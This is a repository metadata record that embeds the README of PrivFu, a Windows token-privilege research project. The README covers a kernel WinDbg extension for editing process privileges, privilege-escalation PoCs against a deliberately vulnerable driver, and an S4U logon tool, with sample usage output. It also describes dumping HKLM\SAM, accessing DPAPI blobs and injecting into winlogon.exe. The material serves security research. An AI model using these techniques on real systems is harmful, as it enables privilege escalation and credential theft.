{"id":13598282,"url":"https://github.com/daem0nc0re/PrivFu","last_synced_at":"2025-04-10T06:31:50.441Z","repository":{"id":40621810,"uuid":"442468298","full_name":"daem0nc0re/PrivFu","owner":"daem0nc0re","description":"Kernel mode WinDbg extension and PoCs for token privilege investigation.","archived":false,"fork":false,"pushed_at":"2024-11-03T10:04:18.000Z","size":13345,"stargazers_count":808,"open_issues_count":1,"forks_count":121,"subscribers_count":15,"default_branch":"main","last_synced_at":"2024-11-03T10:16:45.290Z","etag":null,"topics":["windbg","windbg-extension","windows","windows-kernel"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/daem0nc0re.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-28T13:14:25.000Z","updated_at":"2024-11-03T10:04:22.000Z","dependencies_parsed_at":"2023-09-29T03:30:25.238Z","dependency_job_id":"dbb097f0-a510-4b03-a768-9b2cdde042ee","html_url":"https://github.com/daem0nc0re/PrivFu","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/h
osts/GitHub/owners/daem0nc0re","download_url":"https://codeload.github.com/daem0nc0re/PrivFu/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223427696,"owners_count":17143333,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["windbg","windbg-extension","windows","windows-kernel"],"created_at":"2024-08-01T17:00:51.318Z","updated_at":"2024-11-06T22:32:08.480Z","avatar_url":"https://github.com/daem0nc0re.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# PrivFu\nKernel mode WinDbg extension and PoCs for testing how token privileges work.\n\nThere are notable repositories and articles about token privilege abuse, such as [Grzegorz Tworek](https://twitter.com/0gtweet)'s [Priv2Admin](https://github.com/gtworek/Priv2Admin).\nThe code in this repository is intended to help investigate how token privileges work.\n\n\n## Table Of Contents\n\n- [PrivFu](#privfu)\n  - [ArtsOfGetSystem](#ArtsOfGetSystem)\n  - [KernelWritePoCs](#KernelWritePoCs)\n  - [PrivEditor](#priveditor)\n    - [getps Command](#getps-command)\n    - [getpriv Command](#getpriv-command)\n    - [addpriv Command](#addpriv-command)\n    - [rmpriv Command](#rmpriv-command)\n    - [enablepriv Command](#enablepriv-command)\n    - [disablepriv Command](#disablepriv-command)\n    - [enableall Command](#enableall-command)\n    - [disableall Command](#disableall-command)\n  - [PrivilegedOperations](#privilegedoperations)\n  - [S4uDelegator](#s4udelegator)\n  - [SwitchPriv](#switchpriv)\n  - [TokenDump](#tokendump)\n  - [TokenAssignor](#tokenassignor)\n  - [TrustExec](#trustexec)\n  - [UserRightsUtil](#userrightsutil)\n  - [Reference](#reference)\n  - [Acknowledgments](#acknowledgments)\n\n## ArtsOfGetSystem\n\n[Back to Top](#privfu)\n\n[Project](./ArtsOfGetSystem)\n\nThis project covers how to get system privileges from a high integrity level shell.\nSee [README.md](./ArtsOfGetSystem/README.md) for details.\n\n\n## KernelWritePoCs\n\n[Back to Top](#privfu)\n\n[Project](./KernelWritePoCs)\n\nThe purpose of this project is to investigate how attackers abuse arbitrary kernel write vulnerabilities.\nAll PoCs are written for [HackSys Extreme Vulnerable Driver](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver).\nMost of these PoCs obtain SYSTEM integrity level by abusing an arbitrary kernel write vulnerability and token privileges.\nTested on Windows 10 version 1809/1903, but they should theoretically work on most Windows 10 versions:\n\n| PoC Name | Description |\n| :--- | :--- |\n| [CreateAssignTokenVariant](./KernelWritePoCs/CreateAssignTokenVariant/CreateAssignTokenVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege` and `SeAssignPrimaryTokenPrivilege`. |\n| [CreateImpersonateTokenVariant](./KernelWritePoCs/CreateImpersonateTokenVariant/CreateImpersonateTokenVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege` and `SeImpersonatePrivilege`. |\n| [CreateTokenVariant](./KernelWritePoCs/CreateTokenVariant/CreateTokenVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege`. |\n| [DebugInjectionVariant](./KernelWritePoCs/DebugInjectionVariant/DebugInjectionVariant.cs) | This PoC performs EoP with `SeDebugPrivilege`. Uses code injection into winlogon.exe at the final stage. |\n| [DebugUpdateProcVariant](./KernelWritePoCs/DebugUpdateProcVariant/DebugUpdateProcVariant.cs) | This PoC performs EoP with `SeDebugPrivilege`. Creates a SYSTEM process from winlogon.exe with the `UpdateProcThreadAttribute` API at the final stage. |\n| [RestoreServiceModificationVariant](./KernelWritePoCs/RestoreServiceModificationVariant/RestoreServiceModificationVariant.cs) | This PoC performs EoP with `SeRestorePrivilege`. Use [HijackShellLib](./KernelWritePoCs/HijackShellLib) with this PoC. |\n| [SecondaryLogonVariant](./KernelWritePoCs/SecondaryLogonVariant/SecondaryLogonVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege` and `SeImpersonatePrivilege`. Uses the secondary logon service at the final stage. |\n| [TakeOwnershipServiceModificationVariant](./KernelWritePoCs/TakeOwnershipServiceModificationVariant/TakeOwnershipServiceModificationVariant.cs) | This PoC performs EoP with `SeTakeOwnershipPrivilege`. Use [HijackShellLib](./KernelWritePoCs/HijackShellLib) with this PoC. |\n| [TcbS4uAssignTokenVariant](./KernelWritePoCs/TcbS4uAssignTokenVariant/TcbS4uAssignTokenVariant.cs) | This PoC performs EoP with `SeTcbPrivilege`. Gets a System mandatory level shell from medium mandatory level. |\n| [TcbS4uImpersonationVariant](./KernelWritePoCs/TcbS4uImpersonationVariant/TcbS4uImpersonationVariant.cs) | This PoC performs EoP with `SeTcbPrivilege`. Performs thread impersonation with S4U logon. Does not get high or system integrity level. |\n\n\n## PrivEditor\n\n[Back to Top](#privfu)\n\n[Project](./PrivEditor)\n\n\u003e __Warning__\n\u003e \n\u003e In some environments, the Debug build does not work.\n\u003e The Release build is preferred.\n\nPrivEditor is a kernel mode WinDbg extension to manipulate the token privileges of a specific process.\nThis extension makes it easy to configure the token privileges you want to investigate:\n\n```\n0: kd\u003e .load C:\\dev\\PrivEditor\\x64\\Release\\PrivEditor.dll\n\nPrivEditor - Kernel Mode WinDbg extension for token privilege edit.\n\nCommands :\n    + !getps       : List processes in target system.\n    + !getpriv     : List privileges of a process.\n    + !addpriv     : Add privilege(s) to a process.\n    + !rmpriv      : Remove privilege(s) from a process.\n    + !enablepriv  : Enable privilege(s) of a process.\n    + !disablepriv : Disable privilege(s) of a process.\n    + !enableall   : Enable all privileges available to a process.\n    + !disableall  : Disable all privileges available to a process.\n\n[*] To see command help, execute \"!\u003cCommand\u003e help\" or \"!\u003cCommand\u003e /?\".\n```\n\n\n### getps Command\nThis command lists processes in your target system:\n\n```\n0: kd\u003e !getps /?\n\n!getps - List processes in target system.\n\nUsage : !getps [Process Name]\n\n    Process Name : (OPTIONAL) Specifies filter string for process name.\n```\n\nIf you execute this command without any arguments, it lists all processes in your target system as follows:\n\n```\n0: kd\u003e !getps\n\n     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name\n======== =================== ======================== ============\n       0 0xfffff805`81233630      0x00000000`00000000 Idle\n       4 0xffffd60f`ec068380      0xffffaf00`cec07a40 System\n      68 0xffffd60f`f1780480      0xffffaf00`d3b290a0 svchost.exe\n      88 0xffffd60f`ec0db080      0xffffaf00`cec0d080 Registry\n     324 0xffffd60f`ef342040      0xffffaf00`d0416080 smss.exe\n     348 0xffffd60f`f052f100      0xffffaf00`d25d30a0 dwm.exe\n     408 0xffffd60f`eca8e140      0xffffaf00`d21bd930 csrss.exe\n     480 0xffffd60f`f05a8340      0xffffaf00`d2568670 svchost.exe\n     484 0xffffd60f`efcd60c0      0xffffaf00`d06430e0 wininit.exe\n     500 0xffffd60f`efd130c0      0xffffaf00`d23100a0 csrss.exe\n     580 0xffffd60f`efdc0080      0xffffaf00`d2266630 winlogon.exe\n\n--snip--\n```\n\nIf you want to find specific processes, set a string filter as follows.\nThe filter uses prefix matching and is case insensitive:\n\n```\n0: kd\u003e !getps micro\n\n     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name\n======== =================== ======================== ============\n    4568 0xffffd60f`f14ed080      0xffffaf00`d3db60a0 MicrosoftEdge.exe\n    4884 0xffffd60f`f1647080      0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe\n    4892 0xffffd60f`f1685080      0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe\n```\n\n\n### getpriv Command\nThis command lists the token privileges of a specific process:\n\n```\n0: kd\u003e !getpriv /?\n\n!getpriv - List privileges of a process.\n\nUsage : !getpriv \u003cPID\u003e\n\n    PID : Specifies target process ID.\n```\n\nTo use this command, you need to set a target process ID in decimal format as follows:\n\n```\n0: kd\u003e !getpriv 5704\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Disabled\n\n[*] PID                      : 5704\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0\n```\n\n\n### addpriv Command\nThis command adds token privilege(s) to a specific process:\n\n```\n0: kd\u003e !addpriv /?\n\n!addpriv - Add privilege(s) to a process.\n\nUsage : !addpriv \u003cPID\u003e \u003cPrivilege\u003e\n\n    PID       : Specifies target process ID.\n    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n        + CreateToken                    : SeCreateTokenPrivilege.\n        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.\n        + LockMemory                     : SeLockMemoryPrivilege.\n        + IncreaseQuota                  : SeIncreaseQuotaPrivilege.\n        + MachineAccount                 : SeMachineAccountPrivilege.\n        + Tcb                            : SeTcbPrivilege.\n        + Security                       : SeSecurityPrivilege.\n        + TakeOwnership                  : SeTakeOwnershipPrivilege.\n        + LoadDriver                     : SeLoadDriverPrivilege.\n        + SystemProfile                  : SeSystemProfilePrivilege.\n        + Systemtime                     : SeSystemtimePrivilege.\n        + ProfileSingleProcess           : SeProfileSingleProcessPrivilege.\n        + IncreaseBasePriority           : SeIncreaseBasePriorityPrivilege.\n        + CreatePagefile                 : SeCreatePagefilePrivilege.\n        + CreatePermanent                : SeCreatePermanentPrivilege.\n        + Backup                         : SeBackupPrivilege.\n        + Restore                        : SeRestorePrivilege.\n        + Shutdown                       : SeShutdownPrivilege.\n        + Debug                          : SeDebugPrivilege.\n        + Audit                          : SeAuditPrivilege.\n        + SystemEnvironment              : SeSystemEnvironmentPrivilege.\n        + ChangeNotify                   : SeChangeNotifyPrivilege.\n        + RemoteShutdown                 : SeRemoteShutdownPrivilege.\n        + Undock                         : SeUndockPrivilege.\n        + SyncAgent                      : SeSyncAgentPrivilege.\n        + EnableDelegation               : SeEnableDelegationPrivilege.\n        + ManageVolume                   : SeManageVolumePrivilege.\n        + Impersonate                    : SeImpersonatePrivilege.\n        + CreateGlobal                   : SeCreateGlobalPrivilege.\n        + TrustedCredManAccess           : SeTrustedCredManAccessPrivilege.\n        + Relabel                        : SeRelabelPrivilege.\n        + IncreaseWorkingSet             : SeIncreaseWorkingSetPrivilege.\n        + TimeZone                       : SeTimeZonePrivilege.\n        + CreateSymbolicLink             : SeCreateSymbolicLinkPrivilege.\n        + DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.\n        + All                            : All privileges.\n```\n\nFor example, if you want to add SeDebugPrivilege to a specific process, set the target process ID as the first argument and the shortened privilege name `debug`, as listed in the help message, as the second argument:\n\n```\n0: kd\u003e !getpriv 5704\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Disabled\n\n[*] PID                      : 5704\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0\n\n0: kd\u003e !addpriv 5704 debug\n\n[\u003e] Trying to add SeDebugPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 5704\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeDebugPrivilege                           Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Disabled\n\n[*] PID                      : 5704\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0\n```\n\nThe privilege name argument is case insensitive.\n\nIf you want to add all token privileges at once, set `all` as the privilege name argument:\n\n```\n0: kd\u003e !addpriv 5704 all\n\n[\u003e] Trying to add all privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 5704\n\nPrivilege Name                             State\n========================================== ========\nSeCreateTokenPrivilege                     Disabled\nSeAssignPrimaryTokenPrivilege              Disabled\nSeLockMemoryPrivilege                      Disabled\nSeIncreaseQuotaPrivilege                   Disabled\nSeMachineAccountPrivilege                  Disabled\nSeTcbPrivilege                             Disabled\nSeSecurityPrivilege                        Disabled\n\n--snip--\n```\n\n\n### rmpriv Command\nThis command removes token privilege(s) from a specific process:\n\n```\n0: kd\u003e !rmpriv /?\n\n!rmpriv - Remove privilege(s) from a process.\n\nUsage : !rmpriv \u003cPID\u003e \u003cPrivilege\u003e\n\n    PID       : Specifies target process ID.\n    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n        + CreateToken                    : SeCreateTokenPrivilege.\n        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.\n        + LockMemory                     : SeLockMemoryPrivilege.\n\n--snip--\n```\n\nIf you want to remove SeChangeNotifyPrivilege, execute this command as follows:\n\n```\n0: kd\u003e !getpriv 352\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Disabled\n\n[*] PID                      : 352\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770\n\n0: kd\u003e !rmpriv 352 changenotify\n\n[\u003e] Trying to remove SeChangeNotifyPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 352\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Disabled\n\n[*] PID                      : 352\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770\n```\n\nAs with the `!addpriv` command, you can remove all token privileges at once by setting `all` as the privilege name argument:\n\n```\n0: kd\u003e !rmpriv 352 all\n\n[\u003e] Trying to remove all privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 352\n\nPrivilege Name                             State\n========================================== ========\n\n[*] PID                      : 352\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770\n```\n\n\n### enablepriv Command\nThis command enables token privilege(s) of a specific process:\n\n```\n0: kd\u003e !enablepriv /?\n\n!enablepriv - Enable privilege(s) of a process.\n\nUsage : !enablepriv \u003cPID\u003e \u003cPrivilege\u003e\n\n    PID       : Specifies target process ID.\n    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n        + CreateToken                    : SeCreateTokenPrivilege.\n        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.\n        + LockMemory                     : SeLockMemoryPrivilege.\n\n--snip--\n```\n\nThe first argument is the process ID, and the second is the token privilege name:\n\n```\n0: kd\u003e !getpriv 1932\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Disabled\n\n[*] PID                      : 1932\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n\n0: kd\u003e !enablepriv 1932 timezone\n\n[\u003e] Trying to enable SeTimeZonePrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 1932\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Enabled\n\n[*] PID                      : 1932\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n```\n\nIf you try to enable a privilege that has not been added yet, this command adds it automatically:\n\n```\n0: kd\u003e !getpriv 1932\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Enabled\n\n[*] PID                      : 1932\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n\n0: kd\u003e !enablepriv 1932 debug\n\n[*] SeDebugPrivilege is not present.\n[\u003e] Trying to add SeDebugPrivilege.\n[\u003e] Trying to enable SeDebugPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 1932\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeDebugPrivilege                           Enabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Enabled\n\n[*] PID                      : 1932\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n```\n\n\n### disablepriv Command\nThis command disables token privilege(s) of a specific process:\n\n```\n0: kd\u003e !disablepriv /?\n\n!disablepriv - Disable privilege(s) of a process.\n\nUsage : !disablepriv \u003cPID\u003e \u003cPrivilege\u003e\n\n    PID       : Specifies target process ID.\n    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n        + CreateToken                    : SeCreateTokenPrivilege.\n        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.\n        + LockMemory                     : SeLockMemoryPrivilege.\n\n--snip--\n```\n\nTo use this command, set the target process ID as the first argument and the token privilege name as the second argument:\n\n```\n0: kd\u003e !getpriv 1932\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeDebugPrivilege                           Enabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Enabled\n\n[*] PID                      : 1932\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n\n0: kd\u003e !disablepriv 1932 debug\n\n[\u003e] Trying to disable SeDebugPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 1932\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeDebugPrivilege                           Disabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\nSeTimeZonePrivilege                        Enabled\n\n[*] PID                      : 1932\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n```\n\n\n### enableall Command\nThis command enables all token privileges available to a specific process:\n\n```\n0: kd\u003e !enableall /?\n\n!enableall - Enable all privileges available to a process.\n\nUsage : !enableall \u003cPID\u003e\n\n    PID       : Specifies target process ID.\n```\n\nIt works as follows:\n\n```\n0: kd\u003e !getpriv 3792\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Disabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\n\n[*] PID                      : 3792\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n\n0: kd\u003e !enableall 3792\n\n[\u003e] Trying to enable all available privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 3792\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Enabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Enabled\nSeIncreaseWorkingSetPrivilege              Enabled\n\n[*] PID                      : 3792\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n```\n\n\n### disableall Command\nThis command disables all token privileges of a specific process:\n\n```\n0: kd\u003e !disableall /?\n\n!disableall - Disable all privileges available to a process.\n\nUsage : !disableall \u003cPID\u003e\n\n    PID : Specifies target process ID.\n```\n\nThis command is equivalent to `!disablepriv \u003cPID\u003e all`. It works as follows:\n\n```\n0: kd\u003e !getpriv 3792\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Enabled\nSeChangeNotifyPrivilege                    Enabled\nSeUndockPrivilege                          Enabled\nSeIncreaseWorkingSetPrivilege              Enabled\n\n[*] PID                      : 3792\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n\n0: kd\u003e !disableall 3792\n\n[\u003e] Trying to disable all available privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 3792\n\nPrivilege Name                             State\n========================================== ========\nSeShutdownPrivilege                        Disabled\nSeChangeNotifyPrivilege                    Disabled\nSeUndockPrivilege                          Disabled\nSeIncreaseWorkingSetPrivilege              Disabled\n\n[*] PID                      : 3792\n[*] Process Name             : cmd.exe\n[*] nt!_EPROCESS             : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n```\n\n\n## PrivilegedOperations\n\n[Back to Top](#privfu)\n\n[Project](./PrivilegedOperations)\n\nThis project contains PoCs for sensitive token privileges such as `SeDebugPrivilege`.\nCurrently, PoCs are released for only some of them.\n\n| Program Name | Description |\n| :--- | :--- |\n| [SeAuditPrivilegePoC](./PrivilegedOperations/SeAuditPrivilegePoC) | This PoC tries to create new security event(s) by `SeAuditPrivilege`. `SeAuditPrivilege` does not require high integrity level, but this PoC requires administrative privileges at the first execution to install a new event source. Additionally, to confirm the result, this PoC may require modification of a local security policy setting. |\n| [SeBackupPrivilegePoC](./PrivilegedOperations/SeBackupPrivilegePoC) | This PoC tries to dump `HKLM\\SAM` by `SeBackupPrivilege`. |\n| [SeCreatePagefilePrivilegePoC](./PrivilegedOperations/SeCreatePagefilePrivilegePoC) | This PoC tries to set the pagefile option to specific values by `SeCreatePagefilePrivilege`. |\n| [SeCreateTokenPrivilegePoC](./PrivilegedOperations/SeCreateTokenPrivilegePoC) | This PoC tries to create an elevated token by `SeCreateTokenPrivilege`. |\n| [SeDebugPrivilegePoC](./PrivilegedOperations/SeDebugPrivilegePoC) | This PoC tries to open a handle to winlogon.exe by `SeDebugPrivilege`. |\n| [SeRestorePrivilegePoC](./PrivilegedOperations/SeRestorePrivilegePoC) | This PoC tries to write a test file in `C:\\Windows\\System32\\` by `SeRestorePrivilege`. |\n| [SeSecurityPrivilegePoC](./PrivilegedOperations/SeSecurityPrivilegePoC) | This PoC tries to read the latest security event by `SeSecurityPrivilege`. |\n| [SeShutdownPrivilegePoC](./PrivilegedOperations/SeShutdownPrivilegePoC) | This PoC tries to cause a BSOD by `SeShutdownPrivilege`. |\n| [SeSystemEnvironmentPrivilegePoC](./PrivilegedOperations/SeSystemEnvironmentPrivilegePoC) | This PoC tries to enumerate the system environment by `SeSystemEnvironmentPrivilege`. Works for UEFI based systems only. Due to OS functionality, this PoC does not work on OSes earlier than Windows 10 Build 1809. |\n| [SeTakeOwnershipPrivilegePoC](./PrivilegedOperations/SeTakeOwnershipPrivilegePoC) | This PoC tries to change the owner of `HKLM:\\SYSTEM\\CurrentControlSet\\Services\\dmwappushservice` to the calling user account by `SeTakeOwnershipPrivilege`. |\n| [SeTcbPrivilegePoC](./PrivilegedOperations/SeTcbPrivilegePoC) | This PoC tries to perform S4U Logon to be `Builtin\\Backup Operators` by `SeTcbPrivilege`. |\n| [SeTrustedCredManAccessPrivilegePoC](./PrivilegedOperations/SeTrustedCredManAccessPrivilegePoC) | This PoC tries to access a DPAPI blob by `SeTrustedCredManAccessPrivilege`. |\n\n## S4uDelegator\n\n[Back to Top](#privfu)\n\n[Project](./S4uDelegator)\n\nThis tool performs S4U logon with SeTcbPrivilege.\nTo perform S4U logon with this tool, administrative privileges are required.\n\n```\nPS C:\\Tools\u003e .\\S4uDelegator.exe -h\n\nS4uDelegator - Tool for S4U Logon.\n\nUsage: S4uDelegator.exe [Options]\n\n        -h, --help    : Displays this help message.\n        -l, --lookup  : Flag to lookup account SID.\n        -x, --execute : Flag to execute command.\n        -c, --command : Specifies command to execute. Default is cmd.exe.\n        -d, --domain  : Specifies domain name to lookup or S4U logon.\n        -e, --extra   : Specifies group SIDs you want to add for S4U logon with comma separation.\n        -n, --name    : Specifies account name to lookup or S4U logon.\n        -s, --sid     : Specifies SID to lookup.\n```\n\nTo use this tool, the `-l` or `-x` flag must be specified.\nThe `-l` flag is for looking up account information as follows:\n\n```\nPS C:\\Tools\u003e .\\S4uDelegator.exe -l -d contoso -n \"domain admins\"\n\n[*] Account Name : CONTOSO\\Domain Admins\n[*] SID          : S-1-5-21-3654360273-254804765-2004310818-512\n[*] Account Type : Group\n\nPS C:\\Tools\u003e .\\S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736\n\n[*] Account Name : NT SERVICE\\WinDefend\n[*] SID          : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736\n[*] Account Type : WellKnownGroup\n```\n\nTo execute a command with S4U logon, set the `-x` flag and specify an account name or SID as follows.\nThe command to execute can be specified with the `-c` option (default is `cmd.exe`):\n\n```\nPS C:\\Tools\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name    SID\n============ =============================================\ncontoso\\jeff S-1-5-21-3654360273-254804765-2004310818-1105\nPS C:\\Tools\u003e .\\S4uDelegator.exe -x -d . -n admin\n\n[*] S4U logon target information:\n    [*] Account : CL01\\admin\n    [*] SID     : S-1-5-21-2659926013-4203293582-4033841475-500\n    [*] UPN     : (Null)\n    [*] Type    : User\n[\u003e] Trying to get SYSTEM.\n[+] Got SYSTEM privileges.\n[\u003e] Trying to S4U logon.\n[+] S4U logon is successful.\n[\u003e] Trying to create a token assigned process.\nMicrosoft Windows [Version 10.0.18362.175]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Tools\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name  SID\n========== =============================================\ncl01\\admin S-1-5-21-2659926013-4203293582-4033841475-500\n```\n\nIf you want to add extra group information, set group SIDs as comma-separated values with the `-e` option as follows:\n\n```\nPS C:\\Tools\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name     SID\n============= =============================================\ncontoso\\david S-1-5-21-3654360273-254804765-2004310818-1104\nPS C:\\Tools\u003e .\\S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell\n\n[*] S4U logon target information:\n  